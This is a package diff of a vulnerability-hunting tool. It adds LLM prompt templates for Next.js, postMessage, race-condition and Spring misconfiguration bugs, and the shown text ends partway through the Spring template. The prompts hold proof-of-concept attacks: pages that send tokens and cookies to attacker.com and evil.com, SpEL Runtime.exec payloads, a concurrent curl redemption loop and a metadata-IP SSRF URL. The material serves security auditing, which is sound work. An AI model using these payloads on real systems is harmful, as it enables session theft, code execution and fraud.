tryassay 0.33.1 → 0.34.0

package/dist/hunt/templates/nextjs-misconfig.js

@@ -0,0 +1,127 @@
+export const nextjsMisconfig = {
+    id: 'nextjs-misconfig',
+    name: 'Next.js Misconfiguration',
+    cwe: 'CWE-284',
+    filePatterns: [
+        'next',
+        'middleware',
+        'server-action',
+        'use server',
+        'getServerSideProps',
+        'api/route',
+        'app/api',
+        'next.config',
+    ],
+    negativePatterns: ['test', 'spec', 'mock', '__tests__', 'stories'],
+    minMatchScore: 1,
+    triagePrompt: `You are a security researcher hunting for Next.js-specific vulnerabilities.
+
+These are framework-level footguns that generic web vulnerability templates miss. Focus on:
+
+1. SERVER ACTIONS WITHOUT AUTH CHECKS
+   - Look for files with \`'use server'\` directive
+   - Every exported async function in a \`'use server'\` file is callable from the client
+   - Check whether each server action validates the user session before performing mutations
+   - A server action that deletes/updates data without \`auth()\` or \`getServerSession()\` is exploitable
+
+2. MIDDLEWARE BYPASS
+   - Read \`middleware.ts\` or \`middleware.js\` at the project root
+   - Check the \`matcher\` config — does it cover ALL routes that need protection?
+   - Requests to \`/_next/\` paths skip middleware by default
+   - Requests to static files (images, fonts) skip middleware by default
+   - If auth is ONLY in middleware (not in the route handler), a matcher gap = auth bypass
+
+3. SERVER COMPONENT DATA EXPOSURE
+   - Server Components run on the server but their output is sent to the client
+   - If a Server Component fetches sensitive data (admin info, other users' data) without auth checks, that data lands in the RSC payload visible in the browser
+   - Look for database queries in Server Components without session validation
+   - Check whether \`searchParams\` or \`params\` are used to access other users' data (IDOR)
+
+4. NEXT.CONFIG.JS SECURITY
+   - \`rewrites()\` and \`redirects()\` — can the destination be user-controlled? (Open redirect)
+   - \`images.remotePatterns\` — overly permissive patterns allow SSRF via image optimization
+   - \`dangerouslyAllowSVG: true\` — SVGs can contain XSS payloads served with wrong content-type
+   - Missing \`headers()\` security headers (CSP, X-Frame-Options, etc.)
+   - \`publicRuntimeConfig\` — values here are exposed to the client, check for secrets
+
+5. API ROUTE HANDLER ISSUES
+   - \`app/api/*/route.ts\` — check if auth is validated in each handler
+   - Missing rate limiting on API routes
+   - \`GET\` handlers that should be \`POST\` (state-changing operations via GET)
+   - Response headers not setting \`Content-Type\` correctly (XSS via JSON injection)
+
+KNOWN BYPASS TECHNIQUES:
+- Middleware matcher bypass: request to \`/_next/data/BUILD_ID/protected-page.json\` may skip middleware
+- Server Action direct call: POST to the page URL with \`Next-Action\` header and form data
+- RSC payload inspection: view source or network tab shows all data Server Components fetched
+- Image optimization SSRF: \`/_next/image?url=http://169.254.169.254/\` if remotePatterns is \`**\`
+- Rewrite open redirect: if rewrite destination includes user query params
+
+RELEVANT REFERENCES:
+- Next.js Security documentation (nextjs.org/docs/app/building-your-application/configuring/security)
+- Next.js Server Actions security (nextjs.org/docs/app/building-your-application/data-fetching/server-actions-and-mutations)
+- OWASP guidance on SSR framework security
+- Vercel security headers documentation`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for a Next.js vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+For each vulnerability type, build a specific attack scenario:
+
+SERVER ACTION WITHOUT AUTH:
+1. Identify the server action function and the file it's in
+2. Confirm it has \`'use server'\` and is exported (or passed to a client component)
+3. Show the exact request: POST to the page URL with \`Next-Action: <action-id>\` header
+4. Demonstrate what unauthorized mutation the attacker can perform
+5. Show the missing auth check — where should \`getServerSession()\` or equivalent be called?
+
+MIDDLEWARE BYPASS:
+1. Show the middleware matcher configuration
+2. Identify the unprotected path pattern
+3. Craft a request URL that matches the protected route but bypasses the matcher
+4. \`/_next/data/<buildId>/<page>.json\` often bypasses matchers that only match \`/page\`
+5. Demonstrate what protected resource becomes accessible
+
+DATA EXPOSURE IN SERVER COMPONENTS:
+1. Identify the Server Component and the data it fetches
+2. Show that no auth check exists before the database query
+3. Explain how to view the leaked data (RSC payload in page source or __next_f script tags)
+4. If IDOR: show how changing a URL param exposes another user's data
+
+CONFIG ISSUES:
+1. For \`dangerouslyAllowSVG\`: craft an SVG with embedded JavaScript
+2. For open redirect via rewrite: show the rewrite rule and the crafted URL
+3. For image SSRF: show the \`/_next/image\` request that reaches internal infrastructure
+4. For exposed secrets in publicRuntimeConfig: identify what's leaked and its impact
+
+SEVERITY GUIDANCE:
+- Server Action without auth on destructive operation: Critical
+- Middleware bypass exposing authenticated routes: High-Critical
+- Data exposure in Server Components: Medium-High (depends on data sensitivity)
+- Config issues (SVG, missing headers): Low-Medium
+- Open redirect via rewrite: Medium
+
+RELEVANT REFERENCES:
+- Next.js App Router architecture (Server vs Client components)
+- Next.js middleware execution order and matcher semantics
+- RSC wire format and how data flows from server to client`,
+    knownBypasses: [
+        'Middleware matcher bypass via /_next/data/BUILD_ID/ prefix',
+        'Server Action called without session via direct POST with Next-Action header',
+        'Server Component data visible in RSC payload (__next_f script tags in page source)',
+        'Open redirect via next.config.js rewrite rules with user-controlled destination',
+        'Image optimization SSRF via /_next/image?url= with permissive remotePatterns',
+        'dangerouslyAllowSVG enabling XSS through SVG with embedded scripts',
+        'publicRuntimeConfig exposing secrets to client-side JavaScript',
+        'Static generation exposing authenticated data in .next/server/app/ JSON files',
+    ],
+    specReferences: [
+        'Next.js Security Documentation',
+        'Next.js Server Actions and Mutations Guide',
+        'Next.js Middleware Documentation (matcher config)',
+        'OWASP Server-Side Rendering Security',
+        'Vercel Security Headers Documentation',
+    ],
+    severityRange: ['low', 'critical'],
+};
+//# sourceMappingURL=nextjs-misconfig.js.map

package/dist/hunt/templates/nextjs-misconfig.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"nextjs-misconfig.js","sourceRoot":"","sources":["../../../src/hunt/templates/nextjs-misconfig.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,eAAe,GAA0B;IACpD,EAAE,EAAE,kBAAkB;IACtB,IAAI,EAAE,0BAA0B;IAChC,GAAG,EAAE,SAAS;IACd,YAAY,EAAE;QACZ,MAAM;QACN,YAAY;QACZ,eAAe;QACf,YAAY;QACZ,oBAAoB;QACpB,WAAW;QACX,SAAS;QACT,aAAa;KACd;IACD,gBAAgB,EAAE,CAAC,MAAM,EAAE,MAAM,EAAE,MAAM,EAAE,WAAW,EAAE,SAAS,CAAC;IAClE,aAAa,EAAE,CAAC;IAChB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;wCA+CwB;IAEtC,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2DA0CyC;IAEzD,aAAa,EAAE;QACb,4DAA4D;QAC5D,8EAA8E;QAC9E,oFAAoF;QACpF,iFAAiF;QACjF,8EAA8E;QAC9E,oEAAoE;QACpE,gEAAgE;QAChE,+EAA+E;KAChF;IACD,cAAc,EAAE;QACd,gCAAgC;QAChC,4CAA4C;QAC5C,mDAAmD;QACnD,sCAAsC;QACtC,uCAAuC;KACxC;IACD,aAAa,EAAE,CAAC,KAAK,EAAE,UAAU,CAAC;CACnC,CAAC"}

package/dist/hunt/templates/postmessage.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const postmessage: VulnerabilityTemplate;

package/dist/hunt/templates/postmessage.js

@@ -0,0 +1,180 @@
+export const postmessage = {
+    id: 'postmessage',
+    name: 'Insufficient postMessage Verification',
+    cwe: 'CWE-345',
+    filePatterns: ['postmessage', 'message', 'origin', 'addEventListener', 'onmessage', 'iframe', 'embed', 'window', 'parent', 'opener'],
+    negativePatterns: [],
+    triagePrompt: `You are a security researcher hunting for postMessage origin verification vulnerabilities. This class of bug has been successfully submitted to programs including Nextcloud and many SaaS applications.
+
+Analyze the code for window.postMessage usage and message event listeners that fail to verify the origin of incoming messages. Focus on:
+
+1. MISSING ORIGIN CHECK:
+   window.addEventListener('message', (event) => {
+     // No event.origin check — accepts messages from ANY window
+     processData(event.data);
+   });
+
+2. INSUFFICIENT ORIGIN CHECK:
+   - Substring match: event.origin.includes('example.com') — matches evil-example.com
+   - EndsWith: event.origin.endsWith('.example.com') — matches if attacker controls a subdomain
+   - StartsWith: event.origin.startsWith('https://example') — matches https://example.evil.com
+   - Regex without anchors: /example\\.com/.test(event.origin) — matches evil-example.com.attacker.com
+   - Case-sensitive when it shouldn't be, or vice versa
+
+3. WILDCARD TARGET ORIGIN:
+   targetWindow.postMessage(sensitiveData, '*');
+   // '*' means ANY origin can receive the message — data leaks to malicious iframe
+
+4. SENSITIVE ACTIONS ON MESSAGE:
+   - Authentication tokens passed via postMessage
+   - DOM manipulation based on message content (XSS)
+   - Navigation/redirect based on message URL
+   - State changes (login, logout, settings modification)
+   - eval() or innerHTML with message data
+
+5. IFRAME EMBEDDING:
+   - Can the vulnerable page be embedded in an iframe by an attacker?
+   - X-Frame-Options / CSP frame-ancestors may prevent embedding
+   - If embeddable + missing origin check = exploitable
+
+ATTACK FLOW:
+1. Attacker creates evil.com with an iframe pointing to vulnerable app
+2. Attacker's page sends postMessage to the iframe
+3. Vulnerable app's message listener receives the message without checking origin
+4. Vulnerable app processes attacker-controlled data (XSS, auth bypass, etc.)
+
+OR (data exfiltration):
+1. Vulnerable app sends sensitive data via postMessage(data, '*')
+2. Attacker's iframe/opener page listens for messages
+3. Attacker receives sensitive tokens, user data, etc.
+
+COMMON VULNERABLE PATTERNS:
+- OAuth popup callbacks: popup sends token to opener without origin check
+- SSO/SAML flows: login result communicated via postMessage
+- Widget/embed communication: parent-child iframe messaging
+- Cross-origin file pickers (Google Drive, Dropbox integrations)
+- Payment form iframes (Stripe, PayPal custom integrations)
+- Chat widgets embedded in third-party sites
+
+CORRECT PATTERNS:
+- Strict origin check: if (event.origin !== 'https://exact.example.com') return;
+- Allowlist: const ALLOWED = ['https://app.example.com']; if (!ALLOWED.includes(event.origin)) return;
+- Specific targetOrigin: window.postMessage(data, 'https://exact.example.com');
+- Message type validation: check event.data.type before processing
+
+KNOWN BYPASS TECHNIQUES:
+- Subdomain takeover: if origin check allows *.example.com and a subdomain is claimable
+- Origin spoofing via about:blank: iframes with about:blank inherit opener's origin in some browsers
+- null origin: sandboxed iframes have origin "null" — if code checks event.origin !== 'null' (string comparison)
+- data: URI iframes: data: URI pages have null origin
+- Chained redirects: open redirect on trusted domain → attacker page → postMessage back to app
+- Browser extensions: content scripts can postMessage with the page's origin context
+
+RELEVANT SPECIFICATIONS:
+- HTML Living Standard Section 9.4.3: Cross-document messaging (postMessage API)
+- HTML Living Standard Section 7.2.5: Origin determination
+- CWE-345: Insufficient Verification of Data Authenticity
+- CWE-346: Origin Validation Error
+
+For each finding, cite the EXACT addEventListener call, whether origin is checked, and what sensitive action is performed based on the message data.`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for a postMessage origin verification vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+VERIFICATION STEPS:
+1. Locate the message event listener and confirm origin check is missing or bypassable
+2. Determine what the listener does with event.data:
+   - Does it manipulate the DOM? (XSS potential)
+   - Does it update auth state? (session hijack)
+   - Does it navigate/redirect? (open redirect)
+   - Does it call eval/Function/innerHTML? (code execution)
+3. Check if the page can be embedded in an attacker-controlled iframe:
+   - X-Frame-Options header present?
+   - CSP frame-ancestors directive?
+   - If not embeddable, can the attack work via window.open instead?
+4. For data exfiltration (postMessage with '*'):
+   - What data is sent?
+   - Can an attacker page listen for it?
+
+PROOF-OF-CONCEPT:
+
+Attacker page (origin check missing):
+\`\`\`html
+<!DOCTYPE html>
+<html>
+<body>
+<iframe id="target" src="https://vulnerable-app.com/page-with-listener"></iframe>
+<script>
+  // Wait for iframe to load
+  document.getElementById('target').onload = function() {
+    // Send malicious message — no origin check on receiver
+    this.contentWindow.postMessage({
+      type: 'auth',
+      token: 'attacker-controlled-value'
+    }, '*');
+  };
+</script>
+</body>
+</html>
+\`\`\`
+
+Attacker page (wildcard targetOrigin — data exfiltration):
+\`\`\`html
+<!DOCTYPE html>
+<html>
+<body>
+<iframe id="target" src="https://vulnerable-app.com/oauth-callback"></iframe>
+<script>
+  // Listen for messages from ANY origin (app sends with '*')
+  window.addEventListener('message', function(event) {
+    // Receive sensitive token
+    fetch('https://attacker.com/steal?token=' + encodeURIComponent(JSON.stringify(event.data)));
+  });
+</script>
+</body>
+</html>
+\`\`\`
+
+DOM XSS via postMessage:
+\`\`\`html
+<script>
+  // Attacker sends: { type: 'update', html: '<img src=x onerror=alert(document.cookie)>' }
+  document.getElementById('target').contentWindow.postMessage({
+    type: 'update',
+    html: '<img src=x onerror="fetch(\'https://evil.com/?\'+document.cookie)">'
+  }, '*');
+</script>
+\`\`\`
+
+SEVERITY ASSESSMENT:
+- Critical: Auth token/session exfiltration via wildcard postMessage
+- Critical: XSS via message data injected into DOM with innerHTML
+- High: Authentication state manipulation (forged login/logout)
+- High: Sensitive data exfiltration (PII, tokens, settings)
+- Medium: Open redirect via message-controlled navigation
+- Medium: UI redressing / content injection without script execution
+- Low: Non-sensitive state manipulation (theme, language preferences)
+
+RELEVANT SPECIFICATIONS:
+- HTML Living Standard Section 9.4.3 (Cross-document messaging)
+- CWE-345 (Insufficient Verification of Data Authenticity)
+- CWE-346 (Origin Validation Error)
+
+Cite exact file paths, line numbers, the addEventListener call, the missing/insufficient origin check, and the sensitive operation performed.`,
+    knownBypasses: [
+        'Subdomain takeover: origin check allows *.example.com, attacker claims abandoned subdomain',
+        'Substring origin check: event.origin.includes("example.com") matches evil-example.com',
+        'null origin via sandboxed iframe or data: URI',
+        'about:blank iframe inheriting opener origin in some browsers',
+        'Open redirect on trusted domain to relay postMessage from attacker origin',
+        'Regex without anchors: /example\\.com/ matches evil-example.com.attacker.com',
+    ],
+    specReferences: [
+        'HTML Living Standard Section 9.4.3 (Cross-document messaging)',
+        'HTML Living Standard Section 7.2.5 (Origin determination)',
+        'CWE-345 (Insufficient Verification of Data Authenticity)',
+        'CWE-346 (Origin Validation Error)',
+    ],
+    severityRange: ['medium', 'critical'],
+};
+//# sourceMappingURL=postmessage.js.map

package/dist/hunt/templates/postmessage.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"postmessage.js","sourceRoot":"","sources":["../../../src/hunt/templates/postmessage.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,WAAW,GAA0B;IAChD,EAAE,EAAE,aAAa;IACjB,IAAI,EAAE,uCAAuC;IAC7C,GAAG,EAAE,SAAS;IACd,YAAY,EAAE,CAAC,aAAa,EAAE,SAAS,EAAE,QAAQ,EAAE,kBAAkB,EAAE,WAAW,EAAE,QAAQ,EAAE,OAAO,EAAE,QAAQ,EAAE,QAAQ,EAAE,QAAQ,CAAC;IACpI,gBAAgB,EAAE,EAAE;IACpB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;qJAwEqI;IAEnJ,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8IAmF4H;IAE5I,aAAa,EAAE;QACb,4FAA4F;QAC5F,uFAAuF;QACvF,+CAA+C;QAC/C,8DAA8D;QAC9D,2EAA2E;QAC3E,8EAA8E;KAC/E;IACD,cAAc,EAAE;QACd,+DAA+D;QAC/D,2DAA2D;QAC3D,0DAA0D;QAC1D,mCAAmC;KACpC;IACD,aAAa,EAAE,CAAC,QAAQ,EAAE,UAAU,CAAC;CACtC,CAAC"}

package/dist/hunt/templates/race-condition.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const raceCondition: VulnerabilityTemplate;

package/dist/hunt/templates/race-condition.js

@@ -0,0 +1,138 @@
+export const raceCondition = {
+    id: 'race-condition',
+    name: 'Race Condition / TOCTOU',
+    cwe: 'CWE-362',
+    filePatterns: ['balance', 'transfer', 'withdraw', 'increment', 'count', 'stock', 'inventory', 'lock', 'mutex', 'atomic', 'transaction', 'credit', 'redeem', 'coupon', 'vote'],
+    negativePatterns: [],
+    triagePrompt: `You are a security researcher hunting for race condition and time-of-check-time-of-use (TOCTOU) vulnerabilities.
+
+Analyze the code for operations where a check and a subsequent action are not performed atomically, allowing concurrent requests to exploit the gap. Focus on:
+
+1. Check-then-act without locking:
+   - Read balance → check balance >= amount → deduct balance (without transaction/lock)
+   - Check coupon not redeemed → mark redeemed → apply discount (separate operations)
+   - Check stock > 0 → decrement stock → create order (no atomic decrement)
+
+2. Database operations without transactions:
+   - SELECT balance → IF balance >= amount → UPDATE balance SET balance = balance - amount
+   - Without BEGIN/COMMIT or SELECT FOR UPDATE, concurrent requests both pass the check
+
+3. File system TOCTOU:
+   - Check if file exists → read/write file (race between check and operation)
+   - Check permissions → perform action (permissions change between check and action)
+
+4. Business logic races:
+   - Double-spend: send two transfer requests simultaneously, both see sufficient balance
+   - Coupon reuse: redeem same single-use coupon in parallel requests
+   - Inventory oversell: buy last item with concurrent requests
+   - Vote manipulation: vote multiple times by sending concurrent requests
+   - Referral abuse: claim referral bonus multiple times concurrently
+   - Free trial abuse: start multiple free trials concurrently before first one registers
+
+CRITICAL PATTERNS:
+- if (user.balance >= amount) { user.balance -= amount; await user.save(); }
+  (read, check, modify, write — not atomic)
+- const coupon = await Coupon.findOne({ code, used: false }); coupon.used = true; await coupon.save();
+  (find-then-update without atomic operation)
+- const count = await redis.get(key); if (count < limit) { await redis.incr(key); }
+  (read-then-increment is not atomic even in Redis)
+
+CORRECT PATTERNS (not vulnerable):
+- SQL: UPDATE accounts SET balance = balance - $amount WHERE id = $id AND balance >= $amount (atomic conditional update)
+- SQL: SELECT ... FOR UPDATE within a transaction (pessimistic locking)
+- MongoDB: findOneAndUpdate with $inc and conditions (atomic)
+- Redis: WATCH/MULTI/EXEC or Lua scripts (atomic operations)
+- Application-level: distributed locks (Redlock), mutex, semaphores
+- Database: serializable isolation level for critical transactions
+- Idempotency keys: reject duplicate requests
+
+KNOWN BYPASS TECHNIQUES:
+- Parallel HTTP requests: send 100 identical requests simultaneously
+- HTTP/2 single-packet attack: send multiple requests in one TCP packet for tighter race window
+- Slow network: hold one request open while another completes to widen the race window
+- Batch endpoints: if batch processing doesn't lock across items
+- Websocket messages: concurrent messages processed by different workers
+
+RELEVANT SPECIFICATIONS:
+- CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization
+- CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition
+- OWASP Testing Guide: Testing for Race Conditions
+
+For each finding, cite the EXACT code where check and action are separated, explain the race window, and describe what concurrent exploitation achieves.`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for a race condition vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+VERIFICATION STEPS:
+1. Identify the check-then-act sequence:
+   - What value is read? (balance, stock, coupon status, vote count)
+   - What condition is checked? (>= amount, not used, < limit)
+   - What action follows? (deduct, mark used, increment)
+2. Confirm the operations are NOT atomic:
+   - Is there a database transaction with appropriate isolation level?
+   - Is there a SELECT FOR UPDATE or row-level lock?
+   - Is there an atomic conditional update (UPDATE ... WHERE condition)?
+   - Is there application-level locking (mutex, Redlock)?
+3. Determine the race window:
+   - How many milliseconds between check and action?
+   - Is there any async I/O (await, callback) between check and action that widens the window?
+4. Determine the impact:
+   - What does double-execution achieve? (double spend, double redeem, oversell)
+   - Is the impact cumulative? (can attacker repeat indefinitely?)
+
+PROOF-OF-CONCEPT:
+\`\`\`bash
+# Send 50 concurrent requests to redeem the same coupon
+for i in $(seq 1 50); do
+  curl -X POST /api/redeem \\
+    -H "Authorization: Bearer <token>" \\
+    -H "Content-Type: application/json" \\
+    -d '{"couponCode": "SINGLE_USE_50OFF"}' &
+done
+wait
+
+# Check how many times the discount was applied
+curl /api/account/transactions -H "Authorization: Bearer <token>"
+# If discount appears more than once, race condition confirmed
+\`\`\`
+
+HTTP/2 single-packet attack (tighter timing):
+\`\`\`python
+# Using h2 library to send multiple requests in one TCP packet
+import h2.connection
+# Build 20 identical POST requests, send all stream headers,
+# then send all DATA frames in a single write() call
+\`\`\`
+
+SEVERITY ASSESSMENT:
+- Critical: Financial double-spend (transfer money, withdraw funds, purchase items)
+- Critical: Privilege escalation via concurrent role assignment
+- High: Coupon/voucher/promo code reuse for financial gain
+- High: Inventory oversell leading to business loss
+- Medium: Vote manipulation, rating manipulation
+- Medium: Rate limit bypass via concurrent requests
+- Low: Non-financial counter manipulation
+
+RELEVANT SPECIFICATIONS:
+- CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization
+- CWE-367: Time-of-check Time-of-use (TOCTOU)
+- OWASP Race Condition Cheat Sheet
+
+Cite exact file paths, line numbers, the non-atomic check-then-act sequence, and the financial or business impact of concurrent exploitation.`,
+    knownBypasses: [
+        'HTTP/2 single-packet attack: multiple requests in one TCP packet for tighter race window',
+        'Parallel HTTP/1.1 requests from multiple connections simultaneously',
+        'Slow-read attack: hold one request open to widen race window for another',
+        'Batch endpoint abuse: batch processing without per-item locking',
+        'WebSocket concurrent messages processed by different worker threads',
+        'Idempotency key absence: no deduplication of identical concurrent requests',
+    ],
+    specReferences: [
+        'CWE-362 (Concurrent Execution using Shared Resource with Improper Synchronization)',
+        'CWE-367 (Time-of-check Time-of-use Race Condition)',
+        'OWASP Testing Guide: Testing for Race Conditions',
+        'HTTP/2 RFC 9113 (multiplexed streams enabling single-packet attacks)',
+    ],
+    severityRange: ['medium', 'critical'],
+};
+//# sourceMappingURL=race-condition.js.map

package/dist/hunt/templates/race-condition.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"race-condition.js","sourceRoot":"","sources":["../../../src/hunt/templates/race-condition.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,aAAa,GAA0B;IAClD,EAAE,EAAE,gBAAgB;IACpB,IAAI,EAAE,yBAAyB;IAC/B,GAAG,EAAE,SAAS;IACd,YAAY,EAAE,CAAC,SAAS,EAAE,UAAU,EAAE,UAAU,EAAE,WAAW,EAAE,OAAO,EAAE,OAAO,EAAE,WAAW,EAAE,MAAM,EAAE,OAAO,EAAE,QAAQ,EAAE,aAAa,EAAE,QAAQ,EAAE,QAAQ,EAAE,QAAQ,EAAE,MAAM,CAAC;IAC7K,gBAAgB,EAAE,EAAE;IACpB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;yJAsDyI;IAEvJ,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8IA2D4H;IAE5I,aAAa,EAAE;QACb,0FAA0F;QAC1F,qEAAqE;QACrE,0EAA0E;QAC1E,iEAAiE;QACjE,qEAAqE;QACrE,4EAA4E;KAC7E;IACD,cAAc,EAAE;QACd,oFAAoF;QACpF,oDAAoD;QACpD,kDAAkD;QAClD,sEAAsE;KACvE;IACD,aAAa,EAAE,CAAC,QAAQ,EAAE,UAAU,CAAC;CACtC,CAAC"}

package/dist/hunt/templates/spring-misconfig.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const springMisconfig: VulnerabilityTemplate;

package/dist/hunt/templates/spring-misconfig.js

@@ -0,0 +1,177 @@
+export const springMisconfig = {
+    id: 'spring-misconfig',
+    name: 'Spring/Spring Boot Misconfiguration',
+    cwe: 'CWE-16',
+    filePatterns: [
+        'spring',
+        'controller',
+        'RequestMapping',
+        'GetMapping',
+        'PostMapping',
+        'SecurityConfig',
+        'application.properties',
+        'application.yml',
+        'WebSecurityConfigurerAdapter',
+    ],
+    negativePatterns: ['test', 'Test', 'spec', 'mock', 'Mock'],
+    minMatchScore: 2,
+    triagePrompt: `You are a security researcher hunting for Spring/Spring Boot-specific vulnerabilities.
+
+These are framework-level footguns that generic templates miss. Focus on:
+
+1. SPRING EXPRESSION LANGUAGE (SpEL) INJECTION
+   - SpEL allows arbitrary code execution if user input reaches an expression parser
+   - Look for \`ExpressionParser\`, \`SpelExpressionParser\`, \`@Value("#{...}")\` with user input
+   - Error messages that interpolate user input into SpEL: \`new SpelExpressionParser().parseExpression(userInput)\`
+   - Spring Data \`@Query\` with SpEL: \`@Query("select u from User u where u.name = :#{#name}")\` is safe, but dynamic SpEL is not
+   - Spring Security expression: \`@PreAuthorize("hasRole('" + userInput + "')")\` — string concat into SpEL = RCE
+
+2. ACTUATOR ENDPOINT EXPOSURE
+   - Spring Boot Actuator exposes management endpoints: /actuator/env, /actuator/heapdump, /actuator/beans, /actuator/configprops
+   - \`/actuator/env\` leaks environment variables (database passwords, API keys)
+   - \`/actuator/heapdump\` provides a full JVM heap dump (extract any in-memory secret)
+   - \`/actuator/shutdown\` (if enabled) allows remote shutdown — DoS
+   - Check \`management.endpoints.web.exposure.include\` — if set to \`*\`, all endpoints are exposed
+   - Check whether actuator endpoints require authentication (SecurityConfig must cover /actuator/**)
+   - Even with Spring Security, actuator paths may be excluded from auth filters
+
+3. MISSING AUTHORIZATION ON CONTROLLERS
+   - Controllers without \`@PreAuthorize\`, \`@Secured\`, or \`@RolesAllowed\` annotations
+   - SecurityConfig with \`.anyRequest().permitAll()\` or overly broad \`antMatchers\`
+   - Method-level security disabled: missing \`@EnableGlobalMethodSecurity\` or \`@EnableMethodSecurity\`
+   - REST endpoints accessible without authentication when security filter chain has gaps
+   - Check for \`http.authorizeRequests().antMatchers("/api/**").permitAll()\`
+
+4. CSRF DISABLED GLOBALLY
+   - \`http.csrf().disable()\` or \`http.csrf(csrf -> csrf.disable())\` — common in REST APIs
+   - If the app also serves HTML forms or has session-based auth, CSRF disable is dangerous
+   - Combined with permissive CORS, this allows cross-origin state-changing requests
+   - Check if CSRF is disabled AND CORS allows broad origins — this is the critical combo
+
+5. OPEN REDIRECT
+   - Spring MVC \`redirect:\` prefix with user-controlled input: \`return "redirect:" + userUrl;\`
+   - \`RedirectView\` with user-controlled URL
+   - \`HttpServletResponse.sendRedirect(userInput)\`
+   - Default Spring Security login success/logout redirect if \`defaultSuccessUrl\` or \`logoutSuccessUrl\` accepts params
+
+6. DESERIALIZATION ATTACKS
+   - \`@RequestBody\` with polymorphic types (Jackson \`@JsonTypeInfo\` with \`Id.CLASS\` or \`Id.MINIMAL_CLASS\`)
+   - \`ObjectMapper\` with \`enableDefaultTyping()\` — allows attacker to specify arbitrary classes
+   - Spring Remote (RMI/HTTP Invoker) accepting serialized Java objects
+   - \`Jackson2ObjectMapperBuilder\` configuration that enables class-based type info globally
+
+7. MASS ASSIGNMENT
+   - \`@ModelAttribute\` binding without \`@InitBinder\` field restrictions
+   - Attacker can set any public setter on the model object via request parameters
+   - Check for sensitive fields: \`role\`, \`admin\`, \`enabled\`, \`authorities\`, \`balance\`
+   - \`DataBinder.setDisallowedFields()\` or \`setAllowedFields()\` should be configured
+
+8. H2 CONSOLE AND DEV TOOLS
+   - \`spring.h2.console.enabled=true\` in production — full SQL console
+   - DevTools remote debug enabled in production (\`spring.devtools.remote.secret\`)
+   - Spring Boot Admin exposed without auth
+   - \`spring.jpa.show-sql=true\` logging SQL with parameter values
+
+KNOWN BYPASS TECHNIQUES:
+- SpEL injection via error messages: inject \`#{T(Runtime).getRuntime().exec('cmd')}\` into a field that appears in an error
+- Actuator heapdump credential extraction: download /actuator/heapdump, use jhat/MAT to find strings
+- Spring4Shell pattern (CVE-2022-22965): class loader manipulation via ModelAttribute binding
+- CSRF disable + CORS wildcard: cross-origin PUT/DELETE with credentials
+- Jackson deserialization gadget chains: JNDI lookup, JDBC connection, ClassPathXmlApplicationContext
+- Redirect bypass: \`redirect:https://evil.com\` or \`redirect://evil.com\` depending on Spring version
+- Actuator path traversal: /actuator;/env may bypass path-based security filters
+
+RELEVANT REFERENCES:
+- Spring Security Reference Documentation (docs.spring.io/spring-security/reference/)
+- Spring Boot Actuator Documentation (docs.spring.io/spring-boot/docs/current/reference/html/actuator.html)
+- OWASP Java Security Cheat Sheet
+- Spring Expression Language documentation (SpEL)`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for a Spring/Spring Boot vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+For each vulnerability type, build a specific attack scenario:
+
+SpEL INJECTION:
+1. Identify where user input reaches a SpEL expression parser
+2. Trace the input from controller parameter to expression evaluation
+3. Craft payload: \`T(java.lang.Runtime).getRuntime().exec('id')\`
+4. For blind SpEL: use time-based payload \`T(Thread).sleep(5000)\` to confirm
+5. Show the exact code path: controller → service → expression parser
+6. Escalate: from code execution to reading files, environment variables, or reverse shell
+
+ACTUATOR EXPOSURE:
+1. Confirm which actuator endpoints are exposed: GET /actuator to list them
+2. For /actuator/env: show leaked credentials or API keys
+3. For /actuator/heapdump: describe how to download and analyze with Eclipse MAT
+4. Check SecurityConfig: is /actuator/** excluded from authentication?
+5. Test path bypass: /actuator;/env or /actuator%3b/env (semicolon tricks for Tomcat)
+6. Show impact: credential theft, configuration disclosure, or remote shutdown
+
+CSRF + CORS COMBINATION:
+1. Confirm CSRF is disabled in SecurityConfig
+2. Check CORS configuration: is \`allowedOrigins("*")\` or \`allowCredentials(true)\` set?
+3. If CORS allows credentials + broad origins with CSRF disabled:
+4. Craft HTML page: \`<script>fetch('http://target/api/transfer', {method:'POST', credentials:'include', body:...})</script>\`
+5. Show the state-changing operation performed cross-origin
+6. This is higher severity than CSRF or CORS alone
+
+DESERIALIZATION:
+1. Find \`@JsonTypeInfo\` annotations with \`use = Id.CLASS\` or \`Id.MINIMAL_CLASS\`
+2. Or find \`enableDefaultTyping()\` on ObjectMapper
